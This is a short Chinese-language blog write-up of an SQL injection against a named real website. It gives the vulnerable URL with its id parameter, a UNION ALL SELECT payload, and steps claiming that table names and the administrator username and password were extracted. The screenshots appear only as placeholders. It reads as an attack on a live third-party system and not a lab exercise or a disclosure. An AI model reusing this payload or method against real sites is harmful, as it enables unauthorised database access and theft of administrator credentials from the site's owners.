注入漏洞1

漏洞URL:http://www.scichi.cn/blog/viewblog.php?id=708

第一步、对漏洞URL中id传参进行payload构造联合查询注入

*Payload: id=-3108 UNION ALL SELECT CONCAT(0x71787a7171,0x57474269744a427a50627850784a7243656a6a6166507446495951504274755a695763614b515875,0x716a6a7171)– —-
*

*image.png
*

第二步、获取数据库信息和管理员账号和密码

(1)表名证明

*image.png
*

(2)管理员账号和密码

*image.png
*

本文标题:注入漏洞1

文章作者:孤桜懶契

发布时间:2021年05月02日 - 18:57:10

最后更新:2021年10月20日 - 13:11:39

原始链接:https://gylq.gitee.io/posts/22.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------